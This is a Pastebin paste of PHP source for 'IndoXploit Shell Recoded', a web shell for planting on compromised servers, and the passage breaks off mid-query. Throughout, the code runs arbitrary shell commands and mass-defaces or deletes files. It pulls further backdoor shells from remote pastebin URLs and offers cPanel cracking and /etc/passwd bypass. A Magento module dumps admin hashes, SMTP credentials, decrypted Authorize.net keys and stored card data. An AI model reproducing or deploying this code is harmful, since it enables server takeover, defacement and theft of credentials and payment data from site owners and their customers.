ToKeiChun

IndoXploit Shell Recoded [w\Jump Gator[OldBug]]

Jan 19th, 2018
478
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 225.89 KB | None | 0 0
  1. <?php
  2. @session_start();
  3. @error_reporting(0);
  4. @error_log(0);
  5. @ini_set('error_log',NULL);
  6. @ini_set('log_errors',0);
  7. @ini_set('max_execution_time',0);
  8. @ini_set('output_buffering',0);
  9. @ini_set('display_errors', 0);
  10. @set_time_limit(0);
  11. @set_magic_quotes_runtime(0);
  12. $lol="7153bac2333cc7d601f17f9b3889d284";
  13. function printLogin() {
  14. ?>
  15. <form enctype="multipart/form-data"action=""
  16. method="post"> <input name="action" type="file" /><br>
  17. <input type="submit" value="upload" />
  18. <br>
  19. <br>
  20. <br>
  21. <br>
  22. <br>
  23. <br>
  24. <br>
  25. <br>
  26. <br>
  27. <br>
  28. <br>
  29. <br>
  30. <br>
  31. <br>
  32. <br>
  33. <br>
  34. <br>
  35. <br>
  36. <br>
  37. <br>
  38. <br>
  39. <br>
  40. <br>
  41. <br>
  42. <br>
  43. <br>
  44. <br>
  45. <br>
  46. <br>
  47. <br>
  48. <br>
  49. <br>
  50. <br>
  51. <br>
  52. </form><form method=post>
  53. <input type=password name=janchonx>
  54. </form></center>
  55. <?php
  56.  
  57. exit;
  58. }
  59. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
  60. if( empty( $lol ) ||
  61. ( isset( $_POST['janchonx'] ) && ( md5($_POST['janchonx']) == $lol ) ) )
  62. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  63. else
  64. printLogin();
  65. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  66. @ob_clean();
  67. $file = $_GET['file'];
  68. header('Content-Description: File Transfer');
  69. header('Content-Type: application/octet-stream');
  70. header('Content-Disposition: attachment; filename="'.basename($file).'"');
  71. header('Expires: 0');
  72. header('Cache-Control: must-revalidate');
  73. header('Pragma: public');
  74. header('Content-Length: ' . filesize($file));
  75. readfile($file);
  76. exit;
  77. }
  78.  
  79. ?>
  80. <html>
  81. <head>
  82. <title>Hacked by Mr.ToKeiChun69</title>
  83. <link href='https://s3-eu-west-1.amazonaws.com/201310-blog/01_vim_java.jpg' rel='icon' type='image/x-icon'/>
  84. <meta name='author' content='Mr.ToKeiChun69'>
  85. <meta charset="UTF-8">
  86. <style type='text/css'>
  87. @import url(https://fonts.googleapis.com/css?family=Abel);
  88. html {
  89. background: #000000;
  90. color: #ffffff;
  91. font-family: 'Abel';
  92. font-size: 13px;
  93. width: 100%;
  94. }
  95. li {
  96. display: inline;
  97. margin: 5px;
  98. padding: 5px;
  99. }
  100. table, th, td {
  101. border-collapse:collapse;
  102. font-family: Tahoma, Geneva, sans-serif;
  103. background: transparent;
  104. font-family: 'Abel';
  105. font-size: 13px;
  106. }
  107. .table_home, .th_home, .td_home {
  108. border: 1px solid #ffffff;
  109. }
  110. th {
  111. padding: 10px;
  112. }
  113. a {
  114. color: #ffffff;
  115. text-decoration: none;
  116. }
  117. a:hover {
  118. color: gold;
  119. text-decoration: underline;
  120. }
  121. b {
  122. color: gold;
  123. }
  124. input[type=text], input[type=password],input[type=submit] {
  125. background: transparent;
  126. color: #ffffff;
  127. border: 1px solid #ffffff;
  128. margin: 5px auto;
  129. padding-left: 5px;
  130. font-family: 'Abel';
  131. font-size: 13px;
  132. }
  133. textarea {
  134. border: 1px solid #ffffff;
  135. width: 100%;
  136. height: 400px;
  137. padding-left: 5px;
  138. margin: 10px auto;
  139. resize: none;
  140. background: transparent;
  141. color: #ffffff;
  142. font-family: 'Abel';
  143. font-size: 13px;
  144. }
  145. select {
  146. background: transparent;
  147. color: #ffffff;
  148. border: 1px solid #ffffff;
  149. margin: 5px auto;
  150. padding-left: 5px;
  151. font-family: 'Abel';
  152. font-size: 13px;
  153. }
  154. .but {
  155. background: transparent;
  156. color: #ffffff;
  157. border: 1px solid #ffffff;
  158. margin: 5px auto;
  159. padding-left: 5px;
  160. font-family: 'Abel';
  161. font-size: 13px;
  162. }
  163. </style>
  164. </head>
  165. <?php
  166. if (file_exists("php.ini")){
  167. }else{
  168. $img = fopen('php.ini', 'w');
  169. $sec = "safe_mode = OFF
  170. disable_funtions = NONE";
  171. fwrite($img ,$sec);
  172. fclose($img);}
  173. function w($dir,$perm) {
  174. if(!is_writable($dir)) {
  175. return "<font color=red>".$perm."</font>";
  176. } else {
  177. return "<font color=lime>".$perm."</font>";
  178. }
  179. }
  180. function UrlLoop($url,$type){
  181.  
  182. $urlArray = array();
  183.  
  184. $ch = curl_init();
  185. curl_setopt($ch, CURLOPT_URL, $url);
  186. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  187. $result = curl_exec($ch);
  188.  
  189. $regex='|<a.*?href="(.*?)"|';
  190. preg_match_all($regex,$result,$parts);
  191. $links=$parts[1];
  192. foreach($links as $link){
  193. array_push($urlArray, $link);
  194. }
  195. curl_close($ch);
  196.  
  197. foreach($urlArray as $value){
  198. $lol="$url$value";
  199. if(preg_match("#$type#is", $lol)) {
  200. echo "$lol\r\n";
  201. }
  202. }
  203. }
  204. function exe($cmd) {
  205. if(function_exists('system')) {
  206. @ob_start();
  207. @system($cmd);
  208. $buff = @ob_get_contents();
  209. @ob_end_clean();
  210. return $buff;
  211. } elseif(function_exists('exec')) {
  212. @exec($cmd,$results);
  213. $buff = "";
  214. foreach($results as $result) {
  215. $buff .= $result;
  216. } return $buff;
  217. } elseif(function_exists('passthru')) {
  218. @ob_start();
  219. @passthru($cmd);
  220. $buff = @ob_get_contents();
  221. @ob_end_clean();
  222. return $buff;
  223. } elseif(function_exists('shell_exec')) {
  224. $buff = @shell_exec($cmd);
  225. return $buff;
  226. }
  227. }
  228. function perms($file){
  229. $perms = fileperms($file);
  230. if (($perms & 0xC000) == 0xC000) {
  231. $info = 's';
  232. } elseif (($perms & 0xA000) == 0xA000) {
  233. $info = 'l';
  234. } elseif (($perms & 0x8000) == 0x8000) {
  235. $info = '-';
  236. } elseif (($perms & 0x6000) == 0x6000) {
  237. $info = 'b';
  238. } elseif (($perms & 0x4000) == 0x4000) {
  239. $info = 'd';
  240. } elseif (($perms & 0x2000) == 0x2000) {
  241. $info = 'c';
  242. } elseif (($perms & 0x1000) == 0x1000) {
  243. $info = 'p';
  244. } else {
  245. $info = 'u';
  246. }
  247. $info .= (($perms & 0x0100) ? 'r' : '-');
  248. $info .= (($perms & 0x0080) ? 'w' : '-');
  249. $info .= (($perms & 0x0040) ?
  250. (($perms & 0x0800) ? 's' : 'x' ) :
  251. (($perms & 0x0800) ? 'S' : '-'));
  252. $info .= (($perms & 0x0020) ? 'r' : '-');
  253. $info .= (($perms & 0x0010) ? 'w' : '-');
  254. $info .= (($perms & 0x0008) ?
  255. (($perms & 0x0400) ? 's' : 'x' ) :
  256. (($perms & 0x0400) ? 'S' : '-'));
  257. $info .= (($perms & 0x0004) ? 'r' : '-');
  258. $info .= (($perms & 0x0002) ? 'w' : '-');
  259. $info .= (($perms & 0x0001) ?
  260. (($perms & 0x0200) ? 't' : 'x' ) :
  261. (($perms & 0x0200) ? 'T' : '-'));
  262. return $info;
  263. }
  264. function hdd($s) {
  265. if($s >= 1073741824)
  266. return sprintf('%1.2f',$s / 1073741824 ).' GB';
  267. elseif($s >= 1048576)
  268. return sprintf('%1.2f',$s / 1048576 ) .' MB';
  269. elseif($s >= 1024)
  270. return sprintf('%1.2f',$s / 1024 ) .' KB';
  271. else
  272. return $s .' B';
  273. }
  274. function ambilKata($param, $kata1, $kata2){
  275. if(strpos($param, $kata1) === FALSE) return FALSE;
  276. if(strpos($param, $kata2) === FALSE) return FALSE;
  277. $start = strpos($param, $kata1) + strlen($kata1);
  278. $end = strpos($param, $kata2, $start);
  279. $return = substr($param, $start, $end - $start);
  280. return $return;
  281. }
  282. if(get_magic_quotes_gpc()) {
  283. function idx_ss($array) {
  284. return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
  285. }
  286. $_POST = idx_ss($_POST);
  287. }
  288. function CreateTools($names,$lokasi){
  289. if ( $_GET['create'] == $names ){
  290. $a= "".$_SERVER['SERVER_NAME']."";
  291. $b= dirname($_SERVER['PHP_SELF']);
  292. $c = "/chonx_tools/".$names.".php";
  293. if (file_exists('chonx_tools/'.$names.'.php')){
  294. echo '<script type="text/javascript">alert("Done");window.location.href = "chonx_tools/'.$names.'.php";</script> ';
  295. }
  296. else {mkdir("chonx_tools", 0777);
  297. file_put_contents('chonx_tools/'.$names.'.php', file_get_contents($lokasi));
  298. echo ' <script type="text/javascript">alert("Done");window.location.href = "chonx_tools/'.$names.'.php";</script> ';}}}
  299.  
  300. CreateTools("wso","http://pastebin.com/raw/3eh3Gej2");
  301. CreateTools("adminer"."https://www.adminer.org/static/download/4.2.5/adminer-4.2.5.php");
  302. CreateTools("b374k","http://pastebin.com/raw/rZiyaRGV");
  303. CreateTools("injection","http://pastebin.com/raw/nxxL8c1f");
  304. CreateTools("MailerDelay","https://pastebin.com/raw/7LRvRwNm");
  305. CreateTools("gamestopceker","http://pastebin.com/raw/QSnw1JXV");
  306. CreateTools("bukapalapak","http://pastebin.com/raw/6CB8krDi");
  307. CreateTools("tokopedia","http://pastebin.com/dvhzWgby");
  308. CreateTools("encodedecode","http://pastebin.com/raw/wqB3G5eZ");
  309. CreateTools("mailer","http://pastebin.com/raw/9yu1DmJj");
  310. CreateTools("r57","http://pastebin.com/raw/G2VEDunW");
  311. CreateTools("tokenpp","http://pastebin.com/raw/72xgmtPL");
  312. CreateTools("extractor","http://pastebin.com/raw/jQnMFHBL");
  313. CreateTools("bh","http://pastebin.com/raw/3L2ESWeu");
  314. CreateTools("dhanus","http://pastebin.com/raw/v4xGus6X");
  315. if(isset($_GET['dir'])) {
  316. $dir = $_GET['dir'];
  317. chdir($_GET['dir']);
  318. } else {
  319. $dir = getcwd();
  320. }
  321. $dir = str_replace("\\","/",$dir);
  322. $scdir = explode("/", $dir);
  323. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>";
  324. $ling="http://".$_SERVER['SERVER_NAME']."".$_SERVER['PHP_SELF']."?create";
  325. $ds = @ini_get("disable_functions");
  326. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  327. $curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  328. $wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  329. $perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  330. $python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  331. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
  332. if(!function_exists('posix_getegid')) {
  333. $user = @get_current_user();
  334. $uid = @getmyuid();
  335. $gid = @getmygid();
  336. $group = "?";
  337. } else {
  338. $uid = @posix_getpwuid(posix_geteuid());
  339. $gid = @posix_getgrgid(posix_getegid());
  340. $user = $uid['name'];
  341. $uid = $uid['uid'];
  342. $group = $gid['name'];
  343. $gid = $gid['gid'];
  344. }
  345. $d0mains = @file("/etc/named.conf");
  346. $users=@file('/etc/passwd');
  347. if($d0mains)
  348. {
  349. $count;
  350. foreach($d0mains as $d0main)
  351. {
  352. if(@ereg("zone",$d0main))
  353. {
  354. preg_match_all('#zone "(.*)"#', $d0main, $domains);
  355. flush();
  356. if(strlen(trim($domains[1][0])) > 2)
  357. {
  358. flush();
  359. $count++;
  360. }
  361. }
  362. }
  363. }
  364.  
  365. $sport=$_SERVER['SERVER_PORT'];
  366. echo "<table style='width:100%'>";
  367. echo "<tr><td>System: <font color=lime>".php_uname()."</font></td></tr>";
  368. echo "<tr><td>User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")</td></tr>";
  369. echo "<tr><td>Server IP: <font color=lime>".gethostbyname($_SERVER['HTTP_HOST'])."</font> | Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font></td></tr>";
  370. echo "<tr><td>HDD: <font color=lime>".hdd(disk_free_space("/"))."</font> / <font color=lime>".hdd(disk_total_space("/"))."</font></td></tr>";
  371. echo "<tr><td>Websites :<font color=lime> $count </font> Domains</td></tr>";
  372. echo "<tr><td>Port :<font color=lime> $sport</font> </td></tr>";
  373. echo "<tr><td>Safe Mode: $sm</td></tr>";
  374. echo "<tr><td>Disable Functions: $show_ds</td></tr>";
  375.  
  376. echo "<tr><td>MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl </td></tr>";
  377. echo "<tr><td>Current DIR: ";
  378. foreach($scdir as $c_dir => $cdir) {
  379. echo "<a href='?dir=";
  380. for($i = 0; $i <= $c_dir; $i++) {
  381. echo $scdir[$i];
  382. if($i != $c_dir) {
  383. echo "/";
  384. }
  385. }
  386. echo "'>$cdir</a>/";
  387. }
  388. echo "<tr><td><form method='post' action='?dir=$dir&do=cmd'>
  389. Command :
  390. <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
  391. </form></td></tr>";
  392. echo "</table><hr>";
  393. echo "<center>";
  394. echo "<ul>";
  395. echo "<li>[ <a href='?'>Home</a> ]</li>";
  396. echo "<li>[ <a href='?dir=$dir&do=upload'>Upload</a> ]</li>";
  397. echo "<li>[ <a href='?dir=$dir&do=cmd'>Command</a> ]</li>";
  398. echo "<li>[ <a href='?dir=$dir&do=mass_deface'>Mass Deface</a> ]</li>";
  399. echo "<li>[ <a href='?dir=$dir&do=config'>Config</a> ]</li>";
  400. echo "<li>[ <a href='?dir=$dir&do=symconfig'>Config 2</a> ]</li>";
  401. echo "<li>[ <a href='?dir=$dir&do=jumping'>Jumping</a> ]</li>";
  402. echo "<li>[ <a href='?dir=$dir&do=symlink'>Symlink</a> ]<br></li>";
  403. echo "<li>[ <a href='?dir=$dir&do=cpanel'>CPanel Crack</a> ]</li>";
  404. echo "<li>[ <a href='?dir=$dir&do=cpftp_auto'>CPanel/FTP Auto Deface</a> ]</li>";
  405. echo "<li>[ <a href='?dir=$dir&do=smtp'>SMTP Grabber</a> ]</li>";
  406. echo "<li>[ <a href='?dir=$dir&do=zoneh'>Zone-H</a> ]</li>";
  407. echo "<li>[ <a href='?dir=$dir&do=defacerid'>Defacer.ID</a> ]</li>";
  408. echo "<li>[ <a href='?dir=$dir&do=cgi'>CGI Telnet</a> ]</li><br>";
  409. echo "<li>[ <a href='?dir=$dir&do=adminer'>Adminer</a> ]</li>";
  410. echo "<li>[ <a href='?dir=$dir&do=fake_root'>Fake Root</a> ]</li>";
  411. echo "<li>[ <a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a> ]</li>";
  412. echo "<li>[ <a href='?dir=$dir&do=auto_wp'>Auto Edit Title WordPress</a> ]</li>";
  413. echo "<li>[ <a href='?dir=$dir&do=auto_dwp'>WordPress Auto Deface</a> ]</li>";
  414. echo "<li>[ <a href='?dir=$dir&do=auto_dwp2'>WordPress Auto Deface V.2</a> ]</li>";
  415. echo "<li>[ <a href='?dir=$dir&do=auto_cu_wp'>WordPress Auto Edit User V.2</a> ]</li>";
  416. echo "<li>[ <a href='?dir=$dir&do=auto_cu_joomla'>Joomla Auto Edit User V.2</a> ]</li>";
  417. echo "<li>[ <a href='?dir=$dir&do=passwbypass'>Bypass etc/passw</a> ]<br></li>";
  418. echo "<li>[ <a href='?dir=$dir&do=loghunter'>Log Hunter</a> ]</li>";
  419. echo "<li>[ <a href='?dir=$dir&do=shellchk'>Shell Checker</a> ]</li>";
  420. echo "<li>[ <a href='?dir=$dir&do=shelscan'>Shell Finder</a> ]</li>";
  421. echo "<li>[ <a href='?dir=$dir&do=zip'>Zip Menu</a> ]</li>";
  422. echo "<li>[ <a href='?dir=$dir&do=injectcode'>Code Inject</a> ]</li>";
  423. echo "<li>[ <a href='?dir=$dir&do=about'>About</a> ]</li>";
  424. echo "<li>[ <a href='?dir=$dir&do=magen'>Magento DB Info</a> ]</li><br>";
  425. echo "<li>[ <a href='?dir=$dir&do=metu'>LogOut</a> ]<br></li>";
  426. echo "</ul>";
  427. echo "</center>";
  428. echo "<hr>";
  429. if($_GET['do'] == 'upload') {
  430. echo "<center>";
  431. if($_POST['upload']) {
  432. if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
  433. $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
  434. } else {
  435. $act = "<font color=red>failed to upload file</font>";
  436. }
  437. }
  438. echo "Upload File: [ ".w($dir,"Writeable")." ]<form method='post' enctype='multipart/form-data'><input type='file' name='ix_file'><input type='submit' value='upload' name='upload'></form>";
  439. echo $act;
  440. echo "</center>";
  441. }
  442. elseif($_GET['do'] == 'cmd') {
  443. if($_POST['do_cmd']) {
  444. echo "<pre>".exe($_POST['cmd'])."</pre>";
  445. }
  446. } elseif($_GET['do'] == 'mass_deface') {
  447. echo "<center><form action=\"\" method=\"post\">\n";
  448. $dirr=$_POST['d_dir'];
  449. $index = $_POST["script"];
  450. $index = str_replace('"',"'",$index);
  451. $index = stripslashes($index);
  452. function edit_file($file,$index){
  453. if (is_writable($file)) {
  454. clear_fill($file,$index);
  455. echo "<Span style='color:green;'><strong> [+] Nyabun 100% Successfull </strong></span><br></center>";
  456. }
  457. else {
  458. echo "<Span style='color:red;'><strong> [-] Ternyata Tidak Boleh Menyabun Disini :( </strong></span><br></center>";
  459. }
  460. }
  461. function hapus_massal($dir,$namafile) {
  462. if(is_writable($dir)) {
  463. $dira = scandir($dir);
  464. foreach($dira as $dirb) {
  465. $dirc = "$dir/$dirb";
  466. $lokasi = $dirc.'/'.$namafile;
  467. if($dirb === '.') {
  468. if(file_exists("$dir/$namafile")) {
  469. unlink("$dir/$namafile");
  470. }
  471. } elseif($dirb === '..') {
  472. if(file_exists("".dirname($dir)."/$namafile")) {
  473. unlink("".dirname($dir)."/$namafile");
  474. }
  475. } else {
  476. if(is_dir($dirc)) {
  477. if(is_writable($dirc)) {
  478. if(file_exists($lokasi)) {
  479. echo "[<font color=lime>DELETED</font>] $lokasi<br>";
  480. unlink($lokasi);
  481. $idx = hapus_massal($dirc,$namafile);
  482. }
  483. }
  484. }
  485. }
  486. }
  487. }
  488. }
  489. function clear_fill($file,$index){
  490. if(file_exists($file)){
  491. $handle = fopen($file,'w');
  492. fwrite($handle,'');
  493. fwrite($handle,$index);
  494. fclose($handle); } }
  495.  
  496. function gass(){
  497. global $dirr , $index ;
  498. chdir($dirr);
  499. $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  500. $files = scandir($dirr) ;
  501. $notallow = array(".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","..",".");
  502. sort($files);
  503. $n = 0 ;
  504. foreach ($files as $file){
  505. if ( $file != $me && is_dir($file) != 1 && !in_array($file, $notallow) ) {
  506. echo "<center><Span style='color: #8A8A8A;'><strong>$dirr/</span>$file</strong> ====> ";
  507. edit_file($file,$index);
  508. flush();
  509. $n = $n +1 ;
  510. }
  511. }
  512. echo "<br>";
  513. echo "<center><br><h3>$n Kali Anda Telah Ngecrot Disini </h3></center><br>";
  514. }
  515. function ListFiles($dirrall) {
  516.  
  517. if($dh = opendir($dirrall)) {
  518.  
  519. $files = Array();
  520. $inner_files = Array();
  521. $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  522. $notallow = array($me,".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","Thumbs.db");
  523. while($file = readdir($dh)) {
  524. if($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow) ) {
  525. if(is_dir($dirrall . "/" . $file)) {
  526. $inner_files = ListFiles($dirrall . "/" . $file);
  527. if(is_array($inner_files)) $files = array_merge($files, $inner_files);
  528. } else {
  529. array_push($files, $dirrall . "/" . $file);
  530. }
  531. }
  532. }
  533.  
  534. closedir($dh);
  535. return $files;
  536. }
  537. }
  538. function gass_all(){
  539. global $index ;
  540. $dirrall=$_POST['d_dir'];
  541. foreach (ListFiles($dirrall) as $key=>$file){
  542. $file = str_replace('//',"/",$file);
  543. echo "<center><strong>$file</strong> ===>";
  544. edit_file($file,$index);
  545. flush();
  546. }
  547. $key = $key+1;
  548. echo "<center><br><h3>$key Kali Anda Telah Ngecrot Disini </h3></center><br>"; }
  549. function sabun_massal($dir,$namafile,$isi_script) {
  550. if(is_writable($dir)) {
  551. $dira = scandir($dir);
  552. foreach($dira as $dirb) {
  553. $dirc = "$dir/$dirb";
  554. $lokasi = $dirc.'/'.$namafile;
  555. if($dirb === '.') {
  556. file_put_contents($lokasi, $isi_script);
  557. } elseif($dirb === '..') {
  558. file_put_contents($lokasi, $isi_script);
  559. } else {
  560. if(is_dir($dirc)) {
  561. if(is_writable($dirc)) {
  562. echo "[<font color=lime>DONE</font>] $lokasi<br>";
  563. file_put_contents($lokasi, $isi_script);
  564. $idx = sabun_massal($dirc,$namafile,$isi_script);
  565. }
  566. }
  567. }
  568. }
  569. }
  570. }
  571. if($_POST['mass'] == 'onedir') {
  572. echo "<br> Versi Text Area<br><textarea style='background:black;outline:none;color:red;' name='index' rows='10' cols='67'>\n";
  573. $ini="http://";
  574. $mainpath=$_POST[d_dir];
  575. $file=$_POST[d_file];
  576. $dir=opendir("$mainpath");
  577. $code=base64_encode($_POST[script]);
  578. $indx=base64_decode($code);
  579. while($row=readdir($dir)){
  580. $start=@fopen("$row/$file","w+");
  581. $finish=@fwrite($start,$indx);
  582. if ($finish){
  583. echo"$ini$row/$file\n";
  584. }
  585. }
  586. echo "</textarea><br><br><br><b>Versi Text</b><br><br><br>\n";
  587. $mainpath=$_POST[d_dir];$file=$_POST[d_file];
  588. $dir=opendir("$mainpath");
  589. $code=base64_encode($_POST[script]);
  590. $indx=base64_decode($code);
  591. while($row=readdir($dir)){$start=@fopen("$row/$file","w+");
  592. $finish=@fwrite($start,$indx);
  593. if ($finish){echo '<a href="http://' . $row . '/' . $file . '" target="_blank">http://' . $row . '/' . $file . '</a><br>'; }
  594. }
  595.  
  596. }
  597. elseif($_POST['mass'] == 'sabunkabeh') { gass(); }
  598. elseif($_POST['mass'] == 'hapusmassal') { hapus_massal($_POST['d_dir'], $_POST['d_file']); }
  599. elseif($_POST['mass'] == 'sabunmematikan') { gass_all(); }
  600. elseif($_POST['mass'] == 'massdeface') {
  601. echo "<div style='margin: 5px auto; padding: 5px'>";
  602. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  603. echo "</div>"; }
  604. else {
  605. echo "
  606. <center><font style='text-decoration: underline;'>
  607. Select Type:<br>
  608. </font>
  609. <select class=\"select\" name=\"mass\" style=\"width: 450px;\" height=\"10\">
  610. <option value=\"onedir\">Mass Deface 1 Dir</option>
  611. <option value=\"massdeface\">Mass Deface ALL Dir</option>
  612. <option value=\"sabunkabeh\">Sabun Massal Di Tempat</option>
  613. <option value=\"sabunmematikan\">Sabun Massal Bunuh Diri</option>
  614. <option value=\"hapusmassal\">Mass Delete Files</option></center></select><br>
  615. <font style='text-decoration: underline;'>Folder:</font><br>
  616. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  617. <font style='text-decoration: underline;'>Filename:</font><br>
  618. <input type='text' name='d_file' value='readthis.txt' style='width: 450px;' height='10'><br>
  619. <font style='text-decoration: underline;'>Index File:</font><br>
  620. <textarea name='script' style='width: 450px; height: 200px;'>Hacked By Mr.ToKeiChun69</textarea><br>
  621. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  622. </form></center>";
  623. }
  624. }
  625. elseif($_GET['do'] == 'magen') {
  626. echo'
  627. <div id="page-wrap">
  628. <center>
  629. <br>
  630. <FORM action="" method="post">
  631. <div align="center">[M A G E N T O] - Stealing Information<br>
  632. <div align="center">coder: sohai & n4KuLa_<br>
  633. <input type="hidden" name="form_action" value="2">
  634. </div>
  635. </div>
  636. ';
  637.  
  638.  
  639. if(file_exists($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml')){
  640. $xml = simplexml_load_file($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml');
  641. if(isset($xml->global->resources->default_setup->connection)) {
  642. $connection = $xml->global->resources->default_setup->connection;
  643. $prefix = $xml->global->resources->db->table_prefix;
  644. $key = $xml->global->crypt->key; //f8cd1881e3bf20108d5f4947e60acfc1
  645. require_once $_SERVER['DOCUMENT_ROOT'].'/app/Mage.php';
  646.  
  647. try {
  648. $app = Mage::app('default');
  649. Mage::getSingleton('core/session', array('name'=>'frontend'));
  650. }catch(Exception $e) { echo 'Message: ' .$e->getMessage()."<br/>\n";}
  651.  
  652. if (!mysql_connect($connection->host, $connection->username, $connection->password)){
  653. print("Could not connect: " . mysql_error());
  654. }
  655. mysql_select_db($connection->dbname);
  656. echo $connection->host."|".$connection->username."|".$connection->password."|".$connection->dbname."| $prefix | $key<br/>\n";
  657.  
  658. $crypto = new Varien_Crypt_Mcrypt();
  659. $crypto->init($key);
  660.  
  661. //=========================================================================================================
  662. $query = mysql_query("SELECT user_id,firstname,lastname,email,username,password FROM admin_user where is_active = '1'");
  663. if (!$query){
  664. echo "<center><b>Gagal</b></center>";
  665. }else{
  666. $site = mysql_fetch_array(mysql_query("SELECT value as website FROM core_config_data WHERE path='web/unsecure/base_url'"));
  667. echo'<br><br>
  668. ====================================================================<br>
  669. [ Admin FROM website : '.$site['website'].'] <br>
  670. ====================================================================<br>';
  671. }
  672. echo "
  673. <table border='1' align='center' >
  674. <tr>
  675. <td>id</td>
  676. <td>firstname</td>
  677. <td>lastname</td>
  678. <td>email</td>
  679. <td>username</td>
  680. <td>password</td>
  681. </tr>";
  682. while($vx = mysql_fetch_array($query)) {
  683. $no = 1;
  684. $user_id = $vx['user_id'];
  685. $username = $vx['username'];
  686. $password = $vx['password'];
  687. $email = $vx['email'];
  688. $firstname = $vx['firstname'];
  689. $lastname = $vx['lastname'];
  690. echo "<tr><pre><td>$user_id</td><td>$firstname</td><td>$lastname</td><td>$email</td><td>$username</td><td>$password</td></pre></tr>";
  691. }
  692. echo "</table><br>";
  693. //=========================================================================================================
  694. $query = mysql_query("SELECT value as user,(SELECT value FROM core_config_data where path = 'payment/authorizenet/trans_key') as pass FROM core_config_data where path = 'payment/authorizenet/login'");
  695. if(mysql_num_rows($query) != 0){
  696. if (!$query){
  697. echo "<center><b>Gagal</b></center>";
  698. }else{
  699. echo'<br><br>
  700. ====================================================================<br>
  701. [ Authorizenet ] <br>
  702. ====================================================================<br>';
  703. }
  704. echo "
  705. <table border='1' align='center' >
  706. <tr>
  707. <td>no</td>
  708. <td>user</td>
  709. <td>pass</td>
  710. </tr>";
  711. $no = 1;
  712. while($vx = mysql_fetch_array($query)) {
  713. $user = $crypto->decrypt($vx['user']);
  714. $pass = $crypto->decrypt($vx['pass']);
  715.  
  716.  
  717. echo "<tr><pre><td>$no</td><td>$user</td><td>$pass</td></pre></tr>";
  718. $no++;
  719. }
  720. echo "</table><br>";
  721. }
  722. //=========================================================================================================
  723. $query_smtp = mysql_query("SELECT (SELECT a.value FROM core_config_data as a WHERE path = 'system/smtpsettings/host') as host , (SELECT b.value FROM core_config_data as b WHERE path = 'system/smtpsettings/port') as port,(SELECT c.value FROM core_config_data as c WHERE path = 'system/smtpsettings/username') as user ,(SELECT d.value FROM core_config_data as d WHERE path = 'system/smtpsettings/password') as pass FROM core_config_data limit 1,1");
  724. if(mysql_num_rows($query_smtp) != 0){
  725. if (!$query_smtp){
  726. echo "<center><b>Gagal</b></center>";
  727. }else{
  728. echo'<br><br>
  729. ====================================================================<br>
  730. [ SMTP ] <br>
  731. ====================================================================<br>';
  732. }
  733. echo "
  734. <table border='1' align='center' >
  735. <tr>
  736. <td>no</td>
  737. <td>host</td>
  738. <td>port</td>
  739. <td>user</td>
  740. <td>pass</td>
  741. </tr>";
  742. $no = 1;
  743. $batas = 0;
  744. while($rows = mysql_fetch_array($query_smtp)) {
  745. $smtphost = $rows[0];
  746. $smtpport = $rows[1];
  747. $smtpuser = $rows[2];
  748. $smtppass = $rows[3];
  749. echo "<tr><pre><td>$no</td><td>$smtphost</td><td>$smtpport</td><td>$smtpuser</td><td>$smtppass</td></pre></tr>";
  750. $no++;
  751. }
  752. echo "</table><br>";
  753. }
  754. //=========================================================================================================
  755. $query = mysql_query("SELECT sfo.updated_at,sfo.cc_owner,sfo.method,sfo.cc_number_enc,sfo.cc_cid_enc,CONCAT(sfo.cc_exp_month,' |',sfo.cc_exp_year) as exp,CONCAT(billing.firstname,' | ',billing.lastname,' | ',billing.street,' | ',billing.city,' | ', billing.region,' | ',billing.postcode,' | ',billing.country_id,' | ',billing.telephone,' |-| ',billing.email) AS 'Billing Address' FROM sales_flat_quote_payment AS sfo JOIN sales_flat_quote_address AS billing ON billing.quote_id = sfo.quote_id AND billing.address_type = 'billing'");
